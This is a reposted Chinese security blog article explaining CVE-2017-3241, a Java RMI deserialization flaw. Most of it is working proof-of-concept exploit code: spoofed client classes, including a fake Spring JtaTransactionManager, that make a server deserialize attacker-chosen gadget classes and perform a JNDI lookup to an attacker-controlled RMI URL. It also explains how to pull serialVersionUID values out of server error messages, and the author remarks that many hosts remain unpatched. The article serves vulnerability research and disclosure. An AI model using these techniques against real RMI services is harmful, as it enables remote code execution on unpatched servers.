rmi远程代码执行漏洞_Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-3241 )...

最新推荐文章于 2024-03-28 09:46:08 发布
最新推荐文章于 2024-03-28 09:46:08 发布
阅读量737 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30914893/article/details/112809076
版权

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

*本文原创作者:jfeiyi,本文属FreeBuf原创奖励计划,未经许可禁止转载

本打算慢慢写出来的,但前几天发现国外有研究员发了一篇关于这个CVE的文章,他和我找到的地方很相似。然而不知道是不是Oracle认为是同一个漏洞然后合并了CVE,还是说我找错了CVE。总之,先简单描述一下漏洞:对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。听起来可能有点绕,请往下看。

就直接上问题代码了。在Java RMI的sun.rmi.server.UnicastRef类中,有如下一段代码:300    protected static Object More ...unmarshalValue(Class> type, ObjectInput in)

301        throws IOException, ClassNotFoundException

302    {

303        if (type.isPrimitive()) {

304            if (type == int.class) {

305                return Integer.valueOf(in.readInt());

306            } else if (type == boolean.class) {

307                return Boolean.valueOf(in.readBoolean());

308            } else if (type == byte.class) {

309                return Byte.valueOf(in.readByte());

310            } else if (type == char.class) {

311                return Character.valueOf(in.readChar());

312            } else if (type == short.class) {

313                return Short.valueOf(in.readShort());

314            } else if (type == long.class) {

315                return Long.valueOf(in.readLong());

316            } else if (type == float.class) {

317                return Float.valueOf(in.readFloat());

318            } else if (type == double.class) {

319                return Double.valueOf(in.readDouble());

320            } else {

321                throw new Error("Unrecognized primitive type: " + type);

322            }

323        } else {

324            return in.readObject();

325        }

326    }

看324行,如果你熟悉java反序列化漏洞,看到此你应该就可以激动了。该代码直接调用readObject,且在原生Java类里。结合2016 black hat上那个spring-tx.jar或者之前apache common中的类,都可以实现远程代码执行。spring-tx里的那个我实验成功了,且Spring rmi中继承了这个漏洞。但Spring team表示不修,和他们没关系。。。

其实写到这,很多技术大牛已经可以自己找出怎么黑了。下面只是简单写写我如何通过正常Java RMI程序来攻击的,因为我觉得这招还是比较淫荡的。

以下是一个正常的服务器端接口,接口参数为Message对象,Message对象是要被序列化的对象:public interface Services extends java.rmi.Remote

{

String sendMessage(Message msg) throws RemoteException;

}

public class Message implements Serializable {

private String msg;

public Message()

{

}

public String getMessage() {

System.out.println("Processing message: "+msg);

return msg;

}

public void setMessage(String msg) {

this.msg = msg;

}

/*

* server will tell the serialVersionUID for first run, then just put it below

*/

private final static long serialVersionUID = 1311618551071721443L;

}

服务器端程序,sendMessage接口实现只是调用getMessage打印字符串:public class RMIServer

implements Services {

public RMIServer() throws RemoteException {

}

public static void main(String args[]) throws Exception {

System.out.println("RMI server started");

RMIServer obj = new RMIServer();

try {

Services stub = (Services) UnicastRemoteObject.exportObject(obj,0);

Registry reg;

try {

reg = LocateRegistry.createRegistry(1099);

System.out.println("java RMI registry created.");

} catch(Exception e) {

System.out.println("Using existing registry");

reg = LocateRegistry.getRegistry();

}

reg.rebind("RMIServer", stub);

} catch (RemoteException e) {

e.printStackTrace();

}

}

@Override

public String sendMessage(Message msg) throws RemoteException {

return msg.getMessage();

}

}

假设服务器端类路径里还存在一个PublicKnown类,比如spring或者apache common包里的某个类:)。这种类大部分情况下会被开发人员会一起打包进项目,但从来不用:package org.xfei.thirdparty;

public class PublicKnown implements Serializable {

private void readObject(java.io.ObjectInputStream stream)

throws  ClassNotFoundException, IOException {

stream.defaultReadObject();

System.out.println("Server object initializing.....");

}

}

如上,该类自己实现了一个readObject方法,用来做XXX事情。。。

以下是正常的客户端代码:public class RMIClient {

public static void main(String args[]) throws Exception {

Registry registry = LocateRegistry.getRegistry("127.0.0.1");

Services obj = (Services) registry.lookup("RMIServer");

Message normal = new Message();

normal.setMessage("Hello");

System.out.println(obj.sendMessage(normal));

}

}

输出我就不放了,就是打印个Hello。

好了,如何攻击呢?

首先在客户端程序里当然要有Message类,而Message类基本应该是公开已知的。然后,虽然Spring tx和Apache common都是开源的,但我们先假设攻击者不知道源代码,但知道PublicKnown的类名和包名,于是他在客户端里构建如下的一个类:package org.xfei.thirdparty;

import java.io.IOException;

import java.io.Serializable;

import org.xfei.pojo.Message;

public class PublicKnown extends Message  implements Serializable{

private final static long serialVersionUID = 7179259861090880402L;

}

重点是包名,类名必须一致,且继承Message,serialVersionUID可以先不知道,之后能找出来。

然后改一改客户端程序:import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

import org.xfei.pojo.Message;

import org.xfei.thirdparty.PublicKnown;

public class RMIClient {

public static void main(String args[]) throws Exception {

Registry registry = LocateRegistry.getRegistry("127.0.0.1");

Services obj = (Services) registry.lookup("RMIServer");

PublicKnown malicious = new PublicKnown();

malicious.setMessage("haha");

System.out.println(obj.sendMessage(malicious));

}

}

服务器端端的输出如下(直接从报告里拷贝过来的截图):

也就是说,服务器端在接收到客户端发送的对象后会按PublicKnown类来反序列化,然后调用PublicKnown的readObject方法。

至此,如何配合Spring-tx.jar里的那个JtaTransactionManager类实现远程代码执行我想大家也知道了。把JtaTransactionManager源代码抄一份,让其继承Message类或者实现Message实现了的接口(如果有)就行。两种我都试验过可行。哦,对了,在JtaTransactionManager中你还需要控制userTransactionName变量的值,直接写在客户端代码里就行了,神奇的服务器端会用客户端提供的变量值和服务器端定义的readObject去执行。

还剩最后一个问题,serialVersionUID怎么得到?在我实验的时候,第一次发PublicKnown类过去的时候不要包含这个变量,服务器端会返回一个错误信息给你,错误信息里会带有这个值。。。。。。

且根据不同的错误信息,你还可以知道你的目标类是否存在于服务器的类路径里。

虽然Oracle已经发了补丁,但我打赌很多地方是不会升级JDK的。。。。

要是有类似于JtaTransactionManager这种可以配合使用的类,还请大家共享一下呀!

例子1:原理上面说了,补一张项目截图:

忽略里面和spring相关的包,那些是为了下面的例子在做准备。这个例子中的代码都是拷贝上面我贴的。你还可以在服务器端的PublicKnown中加个本地变量,并在readObject方法中输出,然后在客户端的PublicKnown中加个同样的变量,赋值,传到服务器端,你会看到变量值会在服务器端被输出出来。

上面也提到不知道服务器端的serialVersionUID,但服务器端会在出现任何异常的情况下把异常信息返回到客户端,如下:

例子2:利用JtaTransactionManager进行JNDI注入的例子:

返回到客户端的部分异常信息(我懒,没有挂个对象在8080端口):Exception in thread "main" org.springframework.transaction.TransactionSystemException: JTA UserTransaction is not available at JNDI location [rmi://127.0.0.1:8080/object]; nested exception is javax.naming.ServiceUnavailableException [Root exception is java.rmi.ConnectException: Connection refused to host: 127.0.0.1; nested exception is:

java.net.ConnectException: Connection refused: connect]

at org.springframework.transaction.jta.JtaTransactionManager.lookupUserTransaction(JtaTransactionManager.java:574)

at org.springframework.transaction.jta.JtaTransactionManager.initUserTransactionAndTransactionManager(JtaTransactionManager.java:448)

at org.springframework.transaction.jta.JtaTransactionManager.readObject(JtaTransactionManager.java:1206)

..................................

at org.xfei.client.RMIClient.main(RMIClient.java:19)

Caused by: javax.naming.ServiceUnavailableException [Root exception is java.rmi.ConnectException: Connection refused to host: 127.0.0.1; nested exception is:

java.net.ConnectException: Connection refused: connect]

at com.sun.jndi.rmi.registry.RegistryContext.lookup(Unknown Source)

at com.sun.jndi.toolkit.url.GenericURLContext.lookup(Unknown Source)

at javax.naming.InitialContext.lookup(Unknown Source)

at org.springframework.jndi.JndiTemplate$1.doInContext(JndiTemplate.java:155)

at org.springframework.jndi.JndiTemplate.execute(JndiTemplate.java:87)

at org.springframework.jndi.JndiTemplate.lookup(JndiTemplate.java:152)

at org.springframework.jndi.JndiTemplate.lookup(JndiTemplate.java:179)

at org.springframework.transaction.jta.JtaTransactionManager.lookupUserTransaction(JtaTransactionManager.java:571)

at org.springframework.transaction.jta.JtaTransactionManager.initUserTransactionAndTransactionManager(JtaTransactionManager.java:448)

.................................................................

Caused by: java.rmi.ConnectException: Connection refused to host: 127.0.0.1; nested exception is:

java.net.ConnectException: Connection refused: connect

at sun.rmi.transport.tcp.TCPEndpoint.newSocket(Unknown Source)

at sun.rmi.transport.tcp.TCPChannel.createConnection(Unknown Source)

at sun.rmi.transport.tcp.TCPChannel.newConnection(Unknown Source)

at sun.rmi.server.UnicastRef.newCall(Unknown Source)

at sun.rmi.registry.RegistryImpl_Stub.lookup(Unknown Source)

... 31 more

Caused by: java.net.ConnectException: Connection refused: connect

at java.net.DualStackPlainSocketImpl.connect0(Native Method)

at java.net.DualStackPlainSocketImpl.socketConnect(Unknown Source)

at java.net.AbstractPlainSocketImpl.doConnect(Unknown Source)

at java.net.AbstractPlainSocketImpl.connectToAddress(Unknown Source)

at java.net.AbstractPlainSocketImpl.connect(Unknown Source)

at java.net.PlainSocketImpl.connect(Unknown Source)

at java.net.SocksSocketImpl.connect(Unknown Source)

at java.net.Socket.connect(Unknown Source)

at java.net.Socket.connect(Unknown Source)

at java.net.Socket.(Unknown Source)

at java.net.Socket.(Unknown Source)

at sun.rmi.transport.proxy.RMIDirectSocketFactory.createSocket(Unknown Source)

at sun.rmi.transport.proxy.RMIMasterSocketFactory.createSocket(Unknown Source)

... 36 more

客户端的JtaTransactionManager代码如下:package org.springframework.transaction.jta;

import java.io.IOException;

import java.io.ObjectInputStream;

import java.io.Serializable;

import java.util.List;

import java.util.Properties;

import javax.naming.NamingException;

import org.apache.commons.logging.Log;

import org.apache.commons.logging.LogFactory;

import org.xfei.pojo.Message;

@SuppressWarnings("serial")

public class JtaTransactionManager extends Message

implements  Serializable {

public static final String DEFAULT_USER_TRANSACTION_NAME = "java:comp/UserTransaction";

public final static long  serialVersionUID = 4720255569299536580L;

private String userTransactionName;

public void setUserTransactionName(String userTransactionName) {

this.userTransactionName = userTransactionName;

}

}

Message有稍做修改:package org.xfei.pojo;

import java.io.Serializable;

import org.springframework.transaction.TransactionDefinition;

import org.springframework.transaction.support.AbstractPlatformTransactionManager;

import org.springframework.transaction.support.DefaultTransactionStatus;

public class Message extends AbstractPlatformTransactionManager implements Serializable {

private String msg;

public Message()

{

}

public String getMessage() {

System.out.println("Processing message: "+msg);

return msg;

}

public void setMessage(String msg) {

this.msg = msg;

}

/*

* server will tell the serialVersionUID for first run, then just put it below

*/

private final static long serialVersionUID = 1311618551071721443L;

@Override

protected void doBegin(Object arg0, TransactionDefinition arg1)

{

// TODO Auto-generated method stub

}

@Override

protected void doCommit(DefaultTransactionStatus arg0)

{

// TODO Auto-generated method stub

}

@Override

protected Object doGetTransaction() {

// TODO Auto-generated method stub

return null;

}

@Override

protected void doRollback(DefaultTransactionStatus arg0)

{

// TODO Auto-generated method stub

}

}

我以前的例子是在Spring RMI中测试的,做起来比这个顺利多了。这次是单独建Java项目测试。。。。

需要主意以下几点:1,当你把假的JtaTransactionManager对象发到服务器端的时候,服务器端其实也要各种初始化,所以会依赖到各种Spring的包,还有一个Apapche common的logger以及jta包。所以服务器端不是单有个Spring-tx.jar就能成功攻击的,但Spring项目里这几个依赖包出现的几率比spring-tx.jar高得多。

2,客户端编译的时候似乎也依赖几个类,我直接把所有spring jar包都放进去了。

3,看到截图,有的小伙伴可能会质疑这个是客户端编译的错误。其实我刚运行出来的时候也这么质疑的。。。但这其实是服务器端发过来的异常信息。

首先,initUserTransactionAndTransactionManager是被调用了的.。这个方法只会是在readObject中被调用,客户端哪里有调用readObject?

其次,客户端JtaTransactionManager代码我是改过的,根本没有相关代码。

最后,客户端jar包里的JtaTransactionManager类我已经删了:

*本文原创作者:jfeiyi,本文属FreeBuf原创奖励计划,未经许可禁止转载

HelloGithub
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
java访问windows注册表 method native_code2sec.com/CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞.md at maste...
weixin_39927508的博客
12-22 1129
Title: CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞Date: 2020-08-04 10:20Category: 漏洞实践Tags: Java,RMI,漏洞,反序列化Slug:Authors: bit4wooSummary:CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞如有错误,敬请斧正!漏洞简介简要说明...
探索RMI_Inj_MemShell:Java RMI漏洞利用与内存shell工具
gitblog_00093的博客
03-28 361
探索RMI_Inj_MemShell:Java RMI漏洞利用与内存shell工具 项目地址:https://gitcode.com/novysodope/RMI_Inj_MemShell 项目简介 RMI_Inj_MemShell 是一个针对Java远程方法接口(Remote Method Invocation, RMI)服务的漏洞利用工具。它旨在帮助安全研究人员和开发人员更好地理解RMI的安全...
CVE-2017-3241Java RMI远程反序列化代码执行
changlu1119的博客
03-27 4525
对于Java RMI,只要是以对象为参数的接口,都可以在客户端构建一个对象,强迫服务端对这个存在于Class Path下可序列化类进行反序列化,从而执行一个不在计划内的方法。 一、了解什么是Java RMI? RMI(Remote Method Invocation),即远程方法调用 1.1 是什么? RMI是一个通信工具,支持存储于不同空间的应用级对象之间进行通信的工具,实现了远程对象之间的无缝调用。 用于不同虚拟机之间的通信,通信的虚拟机可以不在同一个服务器。 RMI是标识了一些对象,允许被其.
rmi 反序列化漏洞_Java安全之RMI反序列化
weixin_35374026的博客
01-13 1144
Java安全之RMI反序列化0x00 前言在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本篇文来分析一下RMI机制。在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是JNI,调用python程序使用到的是Jython。RMI、JNI、Jython,其实在安全中都能发挥比较大的作用。 JNI在安全里面的运用就比较大了,既然可以...
rmi 反序列化漏洞_Java反序列化漏洞详解
weixin_36319281的博客
12-31 473
阅读:26,150Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化漏洞简述后,并对于Java反序列化的Poc进行详细解读。Java反序列化漏洞简介Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方...
RMI.rar_Java RMI_java.rmi_java.rmi.Remot_remote
09-20
Java RMI (Remote Method Invocation 远程方法调用)是用Java在JDK1.1中实现的,它大大增强了Java开发分布式应用的能力。
rmi.zip_Java RMI_java rmi网络_java代码 RMI
09-22
简单的java网络编程 rmi代码 简单 实用
java_rmi.rar_RMI java_java.rmi
09-19
Java编程rmi实例,给出远程方法调用技术在java方面的具体例子。
java-rmi-server.rar_Java RMI_rmi _服务器
09-23
java rmi远程调用服务器搭建,rmi具体实现步骤说明,
rmi.rar_Java RMI_RMI java_RMI policy.all_rmi
09-23
java rmi例子
基于TC72(SPI接口)温度传感器、STM32F103C8T6、LCD1602、FREERTOS的温度采集proteus仿真
05-21
spi
ehcache-core-2.6.9.jar
05-21
javaee/javaweb常用jar包,亲测可用,导入到java工程中即可使用
netty-transport-native-unix-common-4.1.51.Final.jar
05-21
javaEE javaweb常用jar包 , 亲测可用,下载后导入到java工程中使用。
node-v6.14.4-headers.tar.xz
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v10.8.0-headers.tar.xz
最新发布
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
skywalking-plugins.jar skywalking-alarm.jar
05-21
# 分布式链路追踪_skywalking_学习(3) skywalking_plugins.jar skywalking-alarm.jar
用于将现有 digilite .pos 文件转换为 Deeplabcut 可以读取的 .csv 文件matlab代码.zip
05-21
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
反序列化 RCE 漏洞
06-09
反序列化RCE漏洞是一种常见的安全漏洞,发生在Java、Python等语言中的反序列化过程中。攻击者利用该漏洞,可以在受害者系统上执行任意命令,从而实现对系统的完全控制。 该漏洞的原理是,攻击者在序列化对象时,通过精心构造的恶意数据,将一段可执行代码序列化到对象中。当该对象被反序列化时,攻击者的恶意代码就会被执行,从而导致系统被攻击者掌控。 为了避免反序列化RCE漏洞的发生,开发者应该注意以下几点: 1. 对于不受信任的数据,不要直接进行反序列化操作,可以使用JSON等其他格式进行传输。 2. 对于需要进行反序列化操作的数据,应该进行严格的验证和过滤,防止恶意数据的注入。 3. 在反序列化过程中,可以对反序列化的类进行限制,只允许反序列化指定的类。 4. 及时更新相关的依赖库,以修复已知的反序列化RCE漏洞。 总之,反序列化RCE漏洞是一种非常危险的漏洞,开发者和用户都需要注意防范和修复。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值